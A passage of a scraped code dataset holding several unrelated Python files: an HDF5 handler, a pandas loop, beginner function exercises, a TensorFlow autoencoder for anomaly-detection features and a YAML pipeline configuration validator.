obj_type, obj_id):\n \"\"\"Provides access to data groups within the file. Up-to-date\n infos about the file's contents can be gathered by calling\n 'compile_entries_list'.\n CHANGED in nnlib_multiobject_v06: This function got a more\n feature-rich partner in interactive_provide_access that\n automates the selection process and takes only the 'type'\n string directly.\n Arguments\n type: A string that specifies the data group type. This\n should indicate what its contents are used for or where\n they came from. Must be provided.\n id: Since we allow multiple data groups of the same type,\n some kind of counting number is always attached to the type\n string. All AbstractContainer instances offer such an ID\n through their pull function.\n \"\"\"\n if not (obj_type + '_' + str(obj_id)) in self.file.keys():\n self.file.create_group(obj_type + '_' + str(obj_id))\n return SerializedObjectHandler(self, obj_type, obj_id)\n\n\nclass SerializedObjectHandler(AbstractContainer):\n \"\"\"CHANGED in nnlib_multiobject_v04: H5PyHandler has become a lot\n dumber in the sense that it does not rely on keys provided from the\n outside for reading and writing to files anymore. Instead, it (or\n more to the point, the SerializedObjectHandler instances it creates\n for file access) reads and writes whatever you throw at it. It is\n the partner methods' responsibility to deal with complications\n arising from this. The idea behind this is that the Hdf5 access\n can be generic while each container and handler that wants to get\n or save data knows for itself how to deal with its contents.\n \"\"\"\n\n def __init__(self, outer, cont_type, cont_id):\n \"\"\"SerializedObjectHandler needs the following arguments at\n init time.\n Arguments:\n outer: The H5PyHandler instance that created this handler\n instance.\n type: The type of object stored, i.e. 
the name of a nnlib\n container class.\n id: The unique ID of object stored as provided by said\n object.\n \"\"\"\n self.outer = outer\n self.type = cont_type\n self.id = cont_id\n self.file_access_point = outer.file[cont_type + '_' + str(cont_id)]\n # CHANGED: For compatibility reasons, loadstore_instr needs to\n # be a dict. SerializedObjectHandler instances don't need\n # instructions, though, so we fill it with Nones.\n self.loadstore_instr = {}\n for key in self.file_access_point.keys():\n self.loadstore_instr[key] = None\n\n def provide_deduplicator(self):\n return self.outer\n\n def push(self, target, data):\n \"\"\"Receives data that it then writes to the file.\"\"\"\n # Since the file may have been written to before, try to delete\n # the respective group. If that doesn't work, it seems safe to\n # assume that it was not present in the first place and we can\n # continue.\n try:\n del self.file_access_point.attrs[target]\n del self.file_access_point[target]\n except KeyError:\n pass\n # Dispatch. Note that this handler relies on the H5PyHandler\n # it is attached to for the actual saving.\n self.outer._write_dispatch(self.file_access_point, target, data)\n\n def pull(self, target, dpcopy=None):\n \"\"\"Gets and returns data from the h5 file.\n To keep the pull infrastructure consistent with other Container\n classes, the 'dpcopy' argument is accepted but quietly ignored\n because copying (into RAM) is the only mode of operation that\n makes sense when loading from disk.\n \"\"\"\n if target == 'id':\n return self.id\n elif target == 'type':\n return self.type\n else:\n # Dispatch.\n return self.outer._read_dispatch(self.file_access_point, target)","repo_name":"mengze21/Arithmetik-feur-Bildinhalte-mit-Neuronale-Netzen","sub_path":"nnlib/data_ops.py","file_name":"data_ops.py","file_ext":"py","file_size_in_byte":33531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17877353285","text":"# Import cars data\r\nimport pandas as pd\r\ncars = pd.read_csv('cars.csv', index_col = 0)\r\n\r\n# Code for loop that adds COUNTRY column\r\nfor l,r in cars.iterrows():\r\n cars.loc[l,'COUNTRY']=str.upper(r['country'])\r\n\r\n# Print cars\r\nprint(cars)","repo_name":"vjjy001/jdatacamp","sub_path":"PythonLearn/datacamp/loops/exp09.py","file_name":"exp09.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8069903726","text":"# Exercise 1: ---Number length of asterisks---\ndef asterisk(num):\n string = ''\n for i in range(num):\n string += '*'\n return string\n\n\nprint(asterisk(10))\n\n\n# Exercise 2: ---Sum of 2 numbers---\ndef multiply(x, y):\n return x * y\n\n\nprint(multiply(5, 6))\n\n\n# Exercise 3: ---Rectangle of asterisks---\ndef rectangle(width, height):\n line = ''\n for i in range(width):\n line += '*'\n rectangle = ''\n for x in range(height):\n rectangle += f\"{line}\\n\"\n return rectangle\n\n\nprint(rectangle(10, 4))\n\n\n# Exercise 4: ---Rectangle of any sign---\ndef rectangle(width, height, sign):\n line = ''\n for i in range(width):\n line += f'{sign}'\n rectangle = ''\n for x in range(height):\n rectangle += f\"{line}\\n\"\n return rectangle\n\n\nprint(rectangle(10, 4, '#'))\n\n\n# Exercise 5: ---Power of number with another---\ndef power(x, y):\n return x ** y\n\n\nprint(power(5, 6))\n\n\n# Exercise 6: ---Upside down a number---\ndef upside_down(num):\n a = str(num)\n b = a[::-1]\n return 
int(b)\n\n\nprint(upside_down(167))\n\n\n# Exercise 7: ---Char in string---\ndef find(char, string):\n counter = string.count(char)\n if counter == 0:\n return -1\n else:\n return counter\n\n\nprint(find('a', \"abanibi obohebev obotabach\"))\n\n\n# Exercise 8: ---Factorial of number---\ndef factorial(num):\n sum = 1\n for i in range(num):\n sum = sum * num\n num -= 1\n return sum\n\n\nprint(factorial(5))\n\n\n# Exercise 9: ---Add beep to string---\ndef beep(string):\n return f\"{string} beep\"\n\n\nprint(beep(\"what does the fox say?\"))\n\n\n# Exercise 10: ---Multiply under zero?---\ndef mul_2nums(x, y):\n if (x * y) < 0:\n return 0\n else:\n return x * y\n\n\nprint(mul_2nums(9, -20))\n\n\n# Exercise 11: ---Number of digits in number---\ndef digits(num):\n return len(str(num))\n\n\nprint(digits(12345678))\n","repo_name":"elorisraeli/pythonProject1","sub_path":"Mechina-Classes/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"15237796254","text":"import tensorflow as tf\nimport numpy as np\n\n\nclass CompressNet:\n \"\"\"\n This network (auto-encoder) converts its input to\n 1. a (compressed) low dimensional representation\n 2. reconstruction error\n \"\"\"\n\n def __init__(self, hidden_layer_sizes, activation=tf.nn.tanh):\n \"\"\"\n param\n ------------------------\n 1. hidden_layer_sizes : list of int (hidden layer sizes)\n ex) hidden_layer_sizes = [n1, n2]\n input => n1 => n2 => n1 => input\n 2. activation : activation function of hidden layer\n ------------------------\n \"\"\"\n\n self.hidden_layer_sizes = hidden_layer_sizes\n self.activation = activation\n\n def encoder(self, x):\n self.input_size = x.shape[1]\n\n n_layer = 0\n encoder = tf.keras.Sequential(name='encoder')\n # Maybe it would be better to add an explicit input layer here??\n\n for size in self.hidden_layer_sizes[:-1]:\n n_layer += 1\n encoder.add(tf.keras.layers.Dense(size,\n activation=self.activation,\n name='layer_{}'.format(n_layer)))\n n_layer += 1\n encoder.add(tf.keras.layers.Dense(self.hidden_layer_sizes[-1],\n name='layer_{}'.format(n_layer)\n ))\n return encoder(x)\n\n def decoder(self, z):\n n_layer = 0\n decoder = tf.keras.Sequential(name='decoder')\n for size in self.hidden_layer_sizes[:-1][::-1]:\n n_layer += 1\n decoder.add(tf.keras.layers.Dense(size,\n activation=self.activation,\n name=\"layer_{}\".format(n_layer)))\n n_layer += 1\n decoder.add(tf.keras.layers.Dense(self.input_size,\n name=\"layer_{}\".format(n_layer)))\n return decoder(z)\n
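Since the decoder mirrors the encoder's hidden sizes, a quick shape check makes the layout concrete. A hedged sketch (the batch and feature sizes are made up; note encoder must run first, since it records input_size):

x = tf.ones([8, 20])
net = CompressNet([16, 4])
z_c = net.encoder(x)      # (8, 4): input -> 16 -> 4
x_re = net.decoder(z_c)   # (8, 20): 4 -> 16 -> 20, back to the input width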
def loss_as_feature(self, x, x_re):\n \"\"\" Loss for z_r, there are two losses\n 1. loss_E : relative Euclidean distance\n 2. loss_C : Cosine similarity\n \"\"\"\n\n # input type must be tf.float\n norm_x = tf.norm(x, ord='euclidean', axis=1)\n norm_x_re = tf.norm(x_re, ord='euclidean', axis=1)\n dist_x = tf.norm(x - x_re, axis=1)\n dot_x = tf.reduce_sum(x*x_re, axis=1)\n\n min_val = 1e-3\n loss_E = dist_x / (norm_x + min_val)\n loss_C = 0.5 * (1.0 - dot_x / (norm_x * norm_x_re + min_val))\n return tf.concat([loss_E[:, None], loss_C[:, None]], axis=1)\n\n def extract_feature(self, x, x_re, z_c):\n z_r = self.loss_as_feature(x, x_re)\n return tf.concat([z_c, z_r], axis=1)\n\n def compress(self, x):\n \"\"\"convert input x to output z=[z_c,z_r]\n z is the input of the GMM algorithm\n It is composed of low dimensional representation, reconstruction error\n -------\n x : tf.Tensor shape : (n_samples, n_features)\n x_re : reconstructed x value\n -------\n z : tf.Tensor shape : (n_samples, n2 + 2)\n Result data\n Second dimension of this data is equal to\n sum of compressed representation size and\n number of loss function (=2)\n \"\"\"\n z_c = self.encoder(x)\n x_re = self.decoder(z_c)\n\n z = self.extract_feature(x, x_re, z_c)\n\n return z, x_re\n\n def reconstruction_error(self, x, x_re):\n return tf.reduce_mean(tf.reduce_sum(\n tf.square(x - x_re), axis=1), axis=0)\n\n\n# Does not work for arbitrary input shapes; tailored to 2-D input\nx = tf.ones([32,180], dtype=tf.float32)\n\nmodel = CompressNet([60,30, 10, 1])\nz_c = model.encoder(x)\nz_c.shape\nx_re = model.decoder(z_c)\nx_re.shape\nmodel.compress(x)\n\n","repo_name":"Minsung-Jeong/anomaly","sub_path":"PycharmProjects/project22/tutorial/AnomalyDetection/NewDAGMM/compress_net.py","file_name":"compress_net.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23986413224","text":"import datetime\nimport isodate\nimport os\nimport re\nfrom platform import system as system_name\nfrom subprocess import call as system_call\nimport tempfile\n\nimport yaml\nimport voluptuous as v\n\nfrom aws_loosa.processing_pipeline.utils.extract_list_from_file import extract_list_from_file\nfrom aws_loosa.processing_pipeline.watcher import Watcher\nfrom aws_loosa.processing_pipeline.dataset import DataSet\nfrom aws_loosa.processing_pipeline.cli import consts\n\n\nclass PipelineConfigValidator(object):\n def __init__(self, config_fpath, ignore_envs=False):\n if not any(config_fpath.endswith(x) for x in ['.yml', '.yaml', '.YML', '.YAML']):\n raise ValueError(\"The file provided to the PipelineConfigManager constructor is not a YAML file.\")\n\n with open(config_fpath, 'r') as config_file:\n raw_content = config_file.read()\n self._config_fpath = os.path.abspath(config_fpath)\n self._raw_config_dict = yaml.load(raw_content, Loader=yaml.FullLoader)\n self._pipeline_name = self._get_pipeline_name()\n self._previous_dataset_count = 0\n self._current_dataset_count = 0\n self._subset_count = 0\n self._ignore_envs = ignore_envs\n\n @classmethod\n def _raise(cls, message):\n raise v.Invalid(message)\n\n def _get_pipeline_name(self):\n if consts.GLOBAL_NAME_KEY in self._raw_config_dict:\n name = self._raw_config_dict[consts.GLOBAL_NAME_KEY]\n else:\n name = 'pipeline{}'.format(datetime.datetime.now().strftime('%Y%m%d%H%M%S'))\n\n return name\n\n def _generate_dataset_name(self):\n if consts.DATASET_KEY in self._raw_config_dict:\n return self._pipeline_name\n else:\n self._previous_dataset_count = self._current_dataset_count\n self._current_dataset_count += 1\n return \"{}_dataset{}\".format(self._pipeline_name, 
return \"{}_dataset{}\".format(self._pipeline_name, self._current_dataset_count)\n\n    def _generate_subset_name(self):\n        if consts.DATASET_KEY in self._raw_config_dict:\n            dataset_name = self._pipeline_name\n        else:\n            dataset_name = \"{}_dataset{}\".format(self._pipeline_name, self._current_dataset_count)\n\n        if self._previous_dataset_count != self._current_dataset_count:\n            self._subset_count = 0\n        self._subset_count += 1\n\n        return \"{}_subset{}\".format(dataset_name, self._subset_count)\n\n    def _substitute_variables_in_string(self, string):\n        if type(string) is not str:\n            if string is None:\n                return None\n            self._raise(\"A string is required\")\n        matches = set(re.findall('[$][^$]+[$]', string))\n        new_string = string\n        if not matches and '$' in string:\n            print('WARNING: A \"$\" was found in the following string, but it did not have a matching opening or '\n                  f'closing \"$\":\\n{string}\\nIf you were trying to reference a variable, please add the missing \"$\".')\n        for match in matches:\n            var = match[1:-1]\n            env_var = os.getenv(var)\n            if env_var is not None:\n                new_string = new_string.replace(match, env_var)\n            elif consts.GLOBAL_VARS_KEY in self._raw_config_dict and var in self._raw_config_dict[consts.GLOBAL_VARS_KEY]:  # noqa\n                script_var = self._raw_config_dict[consts.GLOBAL_VARS_KEY][var]\n                new_string = new_string.replace(match, script_var)\n            else:\n                if self._ignore_envs:\n                    print(f'WARNING: The variable \"{var}\" was not found in the system environment variables nor in '\n                          'the global->vars definition of the pipeline YAML file')\n                else:\n                    self._raise(f'The variable \"{var}\" was not found in the system environment variables nor in the '\n                                'global->vars definition of the pipeline YAML file')\n\n        substr1 = '../' if '../' in new_string else '..\\\\'\n        parent_dir_count = new_string.count(substr1)\n        if parent_dir_count > 0:\n            abs_path = os.path.dirname(self._config_fpath)\n            for count in range(0, parent_dir_count):\n                abs_path = os.path.dirname(abs_path)\n            new_string = os.path.join(abs_path, new_string.split(substr1 * parent_dir_count)[1])\n\n        substr2 = './' if './' in new_string else '.\\\\'\n        if substr2 in new_string:\n            new_string = os.path.join(os.path.dirname(self._config_fpath), new_string.split(substr2)[1])\n\n        return os.path.join(new_string)\n\n    def validate_boolean(self, val):\n        if not isinstance(val, bool):\n            self._raise('value must be boolean')\n\n        return repr(val)\n\n    def validate_string(self, val):\n        new_val = self._substitute_variables_in_string(val)\n\n        return repr(new_val)\n\n    def validate_variable(self, possible_string):\n        if type(possible_string) is not str:\n            return possible_string\n\n        mod_string = self._substitute_variables_in_string(possible_string)\n        parts = mod_string.split('?')\n        num_parts = len(parts)\n\n        if not os.path.isfile(parts[0]):\n            new_val = possible_string\n        else:\n            fpath = parts[0]\n            col = 0\n            delimeter = ','\n            header = True\n            if num_parts == 2:\n                params = parts[1].split('&')\n                if len(params) > 3:\n                    self._raise('Only three parameters are recognized: \"col\", \"delimeter\", and \"header\"')\n                for param in params:\n                    try:\n                        p_key, p_val = param.split('=')\n                        if p_key == 'col':\n                            col = int(p_val)\n                        elif p_key == 'delimeter':\n                            delimeter = p_val\n                        elif p_key == 'header':\n                            header = p_val.lower() == 'true'\n                        else:\n                            raise ValueError()\n                    except ValueError:\n                        self._raise('The parameters following the csv path must be formatted as follows: '\n                                    '/path/to/file.csv?col=1&header=true&delimeter=\\t')\n\n            new_val = extract_list_from_file(fpath, col, delimeter, header)\n\n        return new_val\n\n    def validate_file_path(self, fpath):\n        if not 
fpath:\n            return repr(None)\n        mod_fpath = self._substitute_variables_in_string(fpath)\n        if not os.path.isfile(mod_fpath):\n            self._raise('The file \"{}\" does not exist'.format(mod_fpath))\n\n        return repr(mod_fpath)\n\n    def validate_process_arg(self, argument):\n        if type(argument) is str:\n            return self._substitute_variables_in_string(argument)\n        else:\n            return repr(argument)\n\n    def validate_duration(self, duration):\n        if not duration:\n            valid_duration = None\n        elif duration.lower() == consts.NONE:\n            valid_duration = datetime.timedelta(0)\n        elif duration == consts.ALL:\n            valid_duration = Watcher.CACHE_ALL\n        else:\n            try:\n                valid_duration = isodate.parse_duration(duration)\n            except isodate.ISO8601Error:\n                self._raise(\"{} does not match the ISO8601 Duration format\".format(duration))\n\n        return repr(valid_duration)\n\n    def validate_logstash_host(self, raw_host):\n        \"\"\"\n        Returns the unmodified host if the host (str) responds to a ping request.\n        Remember that a host may not respond to a ping (ICMP) request even if the host name is valid.\n        \"\"\"\n        host = raw_host\n        if host is not None:\n            host = self._substitute_variables_in_string(raw_host)\n            if '://' in host:\n                protocol = host.split('://')[0]\n                self._raise(f'The host parameter should not contain the protocol (i.e. \"{protocol}\"). Please specify '\n                            'the protocol with the \"protocol\" parameter.')\n\n            mod_host = host.split(':')[0] if ':' in host else host\n\n            # Ping command count option as function of OS\n            param = '-n' if system_name().lower() == 'windows' else '-c'\n\n            # Building the command. Ex: \"ping -c 1 google.com\"\n            command = ['ping', param, '1', str(mod_host)]\n\n            # Pinging\n            with open(os.devnull, 'wb') as f:\n                if system_call(command, stdout=f, stderr=f) != 0:\n                    print(f\"WARNING: The host {host} could not be pinged and thus may be invalid or unreachable on \"\n                          \"the current network.\")\n\n        return repr(host)\n\n    @classmethod\n    def get_datetime_from_relative_time(cls, val):\n        import operator\n        new_val = None\n        if '+' in val:\n            parts = val.split('+')\n            operation = operator.add\n        elif '-' in val:\n            parts = val.split('-')\n            operation = operator.sub\n        try:\n            raw_start = parts[0].strip().lower()\n            raw_duration = parts[1].strip().upper()\n\n            if raw_start not in ['', 'now']:\n                raise ValueError()\n\n            duration = isodate.parse_duration(raw_duration)\n            new_val = operation(datetime.datetime.utcnow(), duration)\n        except Exception:\n            cls._raise('When using relative times, follow the format: [now]+|-')\n\n        return new_val\n\n    def validate_start_time(self, val):\n        try:\n            if not val:\n                new_val = None\n            elif type(val) is datetime.datetime:\n                new_val = val\n            elif type(val) is str:\n                mod_val = self._substitute_variables_in_string(val)\n                if mod_val.lower() == consts.LATEST or mod_val.lower() == consts.NONE:\n                    new_val = None\n                elif mod_val.lower().strip() == consts.NOW:\n                    new_val = datetime.datetime.utcnow()\n                elif any(x in mod_val for x in ['+', '-']):\n                    new_val = self.get_datetime_from_relative_time(mod_val)\n                else:\n                    raise Exception()\n            else:\n                raise Exception()\n        except Exception:\n            self._raise('The \"start\" value must be either a valid keyword (i.e. 
\"latest\" or \"none\"), a relative time of '\n 'the form [now]+|-, or a datetime string in the format YYYY-mm-ddTHH:MM:SSZ')\n\n return repr(new_val)\n\n def validate_end_time(self, val):\n try:\n if not val:\n new_val = None\n elif type(val) is datetime.datetime:\n new_val = val\n elif type(val) is str:\n mod_val = self._substitute_variables_in_string(val)\n if not mod_val or mod_val.lower() == consts.NONE:\n new_val = None\n elif mod_val.lower().strip() == consts.LATEST:\n new_val = Watcher.END_AT_LATEST\n elif any(x in mod_val for x in ['+', '-']):\n new_val = self.get_datetime_from_relative_time(mod_val)\n else:\n raise Exception()\n else:\n raise Exception()\n except Exception:\n self._raise('The \"end\" value must be either a valid keyword (i.e. \"latest\" or \"none\"), a relative time of '\n 'the form [now]+|-, or a datetime string in the format YYYY-mm-ddTHH:MM:SSZ')\n\n return repr(new_val)\n\n def validate_seed_times(self, vals):\n if not vals:\n return None\n\n valid_times = []\n for val in vals:\n new_val = val\n if type(val) == datetime.datetime:\n new_val = val\n elif not val or val.lower() == consts.NONE:\n new_val = None\n elif val.lower() == consts.LATEST:\n new_val = Watcher.END_AT_LATEST\n else:\n self._raise('The \"seed_time\" value must be either a valid keyword (i.e. \"latest\" or \"none\") or a '\n 'datetime string in the format YYYY-mm-ddTHH:MM:SSZ')\n\n valid_times.append(repr(new_val))\n\n return valid_times\n\n def validate_repeat_ref_time(self, val):\n try:\n if not val or str(val).lower() == consts.NOW or str(val).lower() == consts.NONE:\n return repr(None)\n else:\n if type(val) is int:\n if val > 23:\n return repr((datetime.datetime(1, 1, 1) + datetime.timedelta(seconds=val)).time())\n else:\n val = '{}:00:00'.format(str(val))\n return repr(datetime.datetime.strptime(val, '%H:%M:%S').time())\n except Exception as exc:\n self._raise(str(exc))\n\n def validate_skip(self, val):\n if val is None:\n new_val = val\n elif isinstance(val, list):\n new_val = []\n for item in val:\n try:\n dt_obj = isodate.parse_datetime(item)\n new_val.append(dt_obj)\n except Exception:\n try:\n dt_obj = isodate.parse_time(item)\n new_val.append(dt_obj)\n except Exception:\n self._raise(\"The skip parameter must be a list of valid ISO 8601 Times or Datetimes or the \"\n \"path to a python script.\")\n elif isinstance(val, str):\n return self.validate_file_path(val)\n else:\n self._raise(\"The skip parameter must be a list of valid ISO 8601 Times or Datetimes or the path to \"\n \"a python script.\")\n\n return repr(new_val)\n\n def validate_uris(self, val):\n validated_uris = {}\n if val is None:\n return repr(None)\n if isinstance(val, str):\n validated_uris[consts.URI_PRIMARY] = repr([self._substitute_variables_in_string(val)])\n validated_uris[consts.URI_FAILOVER] = repr([self._substitute_variables_in_string(val)])\n elif isinstance(val, list):\n main_uris_list = []\n failover_uris_list = []\n for uri in val:\n if isinstance(uri, dict):\n if consts.URI_PRIMARY not in uri or consts.URI_FAILOVER not in uri:\n self._raise(f'{consts.URI_PRIMARY} and {consts.URI_FAILOVER} key/value pairs must be included '\n 'in uris for failover capability')\n main_uris_list.append(self._substitute_variables_in_string(uri[consts.URI_PRIMARY]))\n failover_uris_list.append(self._substitute_variables_in_string(uri[consts.URI_FAILOVER]))\n else:\n main_uris_list.append(self._substitute_variables_in_string(uri))\n failover_uris_list.append(self._substitute_variables_in_string(uri))\n 
validated_uris[consts.URI_PRIMARY] = repr(main_uris_list)\n validated_uris[consts.URI_FAILOVER] = repr(failover_uris_list)\n else:\n self._raise('The \"uris\" value must either be a single string or a list of strings')\n\n return validated_uris\n\n def validate_log_level(self, val):\n if val not in consts.VALID_LEVELS:\n self._raise(consts.INVALID_LEVEL_ERROR)\n\n return repr(val)\n\n def validate_transfer_dataset(self, val):\n if not val:\n valid_val = DataSet.TRANSFER_ALL\n else:\n if val not in DataSet.TRANSFER_OPTIONS:\n try_val = self._substitute_variables_in_string(val)\n if not os.path.exists(try_val):\n self._raise(DataSet.INVALID_TRANSFER_OPTION_ERROR)\n else:\n valid_val = try_val\n else:\n valid_val = val\n\n return repr(valid_val)\n\n def validate_transfers_dir(self, val):\n if not val:\n return repr(None)\n else:\n return self.validate_string(val)\n\n def validate_credentials(self, raw_val):\n validated_credentials = {}\n valid_keys = [\n consts.DATASET_CREDENTIALS_ACCESS_KEY, consts.DATASET_CREDENTIALS_SECRET_KEY,\n consts.DATASET_CREDENTIALS_TOKEN_KEY\n ]\n if not isinstance(raw_val, dict):\n self._raise(\"The credentials attribute must be specified in dictionary form, with access_key, access_id, \"\n \"or token as the only valid keys\")\n if raw_val:\n validated_credentials = {}\n for key, val in raw_val.items():\n if key not in valid_keys:\n self._raise(\"The only valid keys of the credentials attribute are: access_key, access_id \"\n \"and/or token.\")\n if key in [consts.DATASET_CREDENTIALS_ACCESS_KEY, consts.DATASET_CREDENTIALS_SECRET_KEY]:\n validated_credentials[key] = self._substitute_variables_in_string(val)\n else:\n validated_credentials[key] = dict()\n for token_key, token_val in val.items():\n if isinstance(token_val, dict):\n validated_credentials[key][token_key] = dict()\n for token_key2, token_val2 in token_val.items():\n sub_vars = self._substitute_variables_in_string(token_val2)\n validated_credentials[key][token_key][token_key2] = sub_vars\n else:\n validated_credentials[key][token_key] = self._substitute_variables_in_string(token_val)\n\n return repr(validated_credentials)\n\n def validate_transfer_format(self, raw_val):\n valid_keys = ['find', 'replace']\n if isinstance(raw_val, dict):\n for key in raw_val:\n if key not in valid_keys:\n self._raise(f'The \"{key}\" key is not allowed in the transfer_format specification.')\n return raw_val\n else:\n return repr(raw_val)\n\n def validate_acceptable_uris_missing(self, raw_val):\n if not raw_val:\n return repr(None)\n\n if isinstance(raw_val, int):\n return raw_val\n\n if isinstance(raw_val, str):\n if raw_val[-1] == \"%\":\n percentage = float(raw_val.replace(\"%\", \"\"))\n if not 0 <= percentage <= 100:\n self._raise('Percentages must be between 0 and 100.')\n return repr(raw_val)\n\n if isinstance(raw_val, list) and any(isinstance(val, int) for val in raw_val):\n self._raise('If using a list, values must be a string. 
A single integer value or percentage may also be '\n 'used.')\n\n return self.validate_uris(raw_val)\n\n def get_validated_dict(self):\n # SCHEMAS\n _name_schema = v.Schema(lambda x: re.sub('[ ]+', '_', x.lower()))\n write_space = os.path.join(os.getenv(\"PIPELINE_WORKSPACE\") or tempfile.mkdtemp())\n\n _globals_schema = v.Schema({\n v.Optional(\n consts.GLOBAL_NAME_KEY,\n default=self._pipeline_name\n ): _name_schema,\n\n v.Optional(\n consts.GLOBAL_LOGGING_KEY,\n default={\n consts.GLOBAL_LOGGING_LEVEL_KEY: consts.INFO,\n consts.GLOBAL_LOGGING_DIRECTORY_KEY: os.path.join(write_space, 'logs')\n }\n ): v.Schema({\n v.Optional(\n consts.GLOBAL_LOGGING_LEVEL_KEY,\n default=consts.INFO\n ): v.Schema(self.validate_log_level),\n v.Optional(\n consts.GLOBAL_LOGGING_DIRECTORY_KEY,\n default=os.path.join(write_space, 'logs')\n ): v.Schema(self.validate_string),\n v.Optional(\n consts.GLOBAL_LOGGING_LOGSTASH_KEY,\n default=os.getenv(\"LOGSTASH_SOCKET\")\n ): v.Schema(self.validate_logstash_host),\n }),\n v.Optional(\n consts.GLOBAL_SWITCHBOARDS_KEY,\n default=os.path.join(write_space, 'switchboards', self._pipeline_name)\n ): v.Schema(self.validate_string),\n v.Optional(\n consts.GLOBAL_TRANSFERS_KEY,\n default=os.path.join(write_space, 'transfers')\n ): v.Schema(self.validate_string),\n v.Optional(consts.GLOBAL_VARS_KEY): v.Schema({v.Extra: str}),\n v.Optional(consts.GLOBAL_REQ_ENVS_KEY): v.Schema([str]),\n v.Optional(consts.DATASET_START_KEY, default=None): v.Schema(self.validate_start_time),\n v.Optional(consts.DATASET_STOP_KEY, default=None): v.Schema(self.validate_end_time),\n v.Optional(consts.DATASET_SEED_TIMES_KEY, default=None): v.Schema(self.validate_seed_times)\n })\n globals_dict = dict(self._raw_config_dict)\n\n if consts.DATASETS_KEY in globals_dict:\n del globals_dict[consts.DATASETS_KEY]\n if consts.DATASET_KEY in globals_dict:\n del globals_dict[consts.DATASET_KEY]\n if consts.PROCESSES_KEY in globals_dict:\n del globals_dict[consts.PROCESSES_KEY]\n if consts.PROCESS_KEY in globals_dict:\n del globals_dict[consts.PROCESS_KEY]\n\n self.globals = _globals_schema(globals_dict)\n\n _process_schema = {\n v.Required(consts.PROCESS_SCRIPT_KEY): v.Schema(self.validate_file_path),\n v.Optional(consts.PROCESS_ARGS_KEY, default=[]): v.Schema([self.validate_process_arg]),\n v.Optional(consts.PROCESS_INTERPRETER_KEY, default=None): v.Schema(self.validate_file_path),\n v.Optional(consts.PROCESS_INTERVAL_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.PROCESS_REPEAT_REF_TIME_KEY, default=None): v.Schema(self.validate_repeat_ref_time),\n v.Optional(consts.PROCESS_TIMEOUT_KEY, default=None): v.Schema(self.validate_duration)\n }\n _dataset_list_schema = {\n v.Required(consts.DATASET_URIS_KEY): v.Schema(self.validate_uris),\n v.Required(consts.DATASET_REPEAT_KEY): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_NAME_KEY, default=self._generate_dataset_name): _name_schema,\n v.Optional(consts.DATASET_VARIABLES_KEY, default={}): v.Schema({v.Extra: self.validate_variable}),\n v.Optional(consts.DATASET_WINDOW_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_WINDOW_STEP_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_REPEAT_REF_TIME_KEY, default=None): v.Schema(self.validate_repeat_ref_time),\n v.Optional(consts.DATASET_DELAY_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_EXPIRATION_KEY, default=None): v.Schema(self.validate_duration),\n 
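# Durations in this schema are ISO 8601 strings (e.g. 'PT3M' = 3 minutes), parsed by validate_duration above.\n            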
v.Optional(consts.DATASET_EXPECT_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_SKIP_KEY, default=None): v.Schema(self.validate_skip),\n v.Optional(consts.DATASET_PING_KEY, default='PT3M'): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_FALLBACK_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_CACHE_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_MAX_SERVICE_LAG_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_TRANSFER_KEY, default=consts.ALL): v.Schema(self.validate_transfer_dataset),\n v.Optional(consts.DATASET_CLEAN_KEY, default=False): v.Schema(self.validate_boolean),\n v.Optional(\n consts.DATASET_TRANSFERS_KEY,\n default=eval(self.globals[consts.GLOBAL_TRANSFERS_KEY])\n ): v.Schema(self.validate_transfers_dir),\n\n v.Optional(consts.DATASET_TRANSFER_FORMAT_KEY, default=None): v.Schema(self.validate_transfer_format),\n v.Optional(\n consts.DATASET_CONCURRENT_TRANSFERS_KEY,\n default=Watcher.DEFAULT_MAX_CONCURRENT_TRANSFERS\n ): v.All(int, v.Range(min=1, max=100)),\n v.Optional(consts.DATASET_START_KEY, default=None): v.Schema(self.validate_start_time),\n v.Optional(consts.DATASET_STOP_KEY, default=None): v.Schema(self.validate_end_time),\n v.Optional(consts.DATASET_SEED_TIMES_KEY, default=None): v.Schema(self.validate_seed_times),\n v.Optional(consts.DATASET_CREDENTIALS_KEY, default={}): v.Schema(self.validate_credentials),\n v.Optional(\n consts.DATASET_ACCEPTABLE_URIS_MISSING_KEY,\n default={}\n ): v.Schema(self.validate_acceptable_uris_missing),\n v.Optional(consts.PROCESSES_KEY, default=[]): v.Schema([_process_schema]),\n v.Optional(consts.DATASET_SUBSETS_KEY, default=[]): v.Schema([{\n v.Optional(consts.DATASET_URIS_KEY, default=None): v.Schema(self.validate_uris),\n v.Optional(consts.DATASET_WINDOW_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_VARIABLES_KEY, default={}): v.Schema({v.Extra: self.validate_variable}),\n v.Optional(consts.PROCESSES_KEY, default=[]): v.Schema([_process_schema])\n }])\n }\n _dataset_single_schema = v.Schema({\n v.Required(consts.DATASET_URIS_KEY): v.Schema(self.validate_uris),\n v.Optional(consts.DATASET_REPEAT_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_NAME_KEY, default=self._generate_dataset_name): _name_schema,\n v.Optional(consts.DATASET_VARIABLES_KEY, default={}): v.Schema({v.Extra: self.validate_variable}),\n v.Optional(consts.DATASET_WINDOW_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_WINDOW_STEP_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_REPEAT_REF_TIME_KEY, default=None): 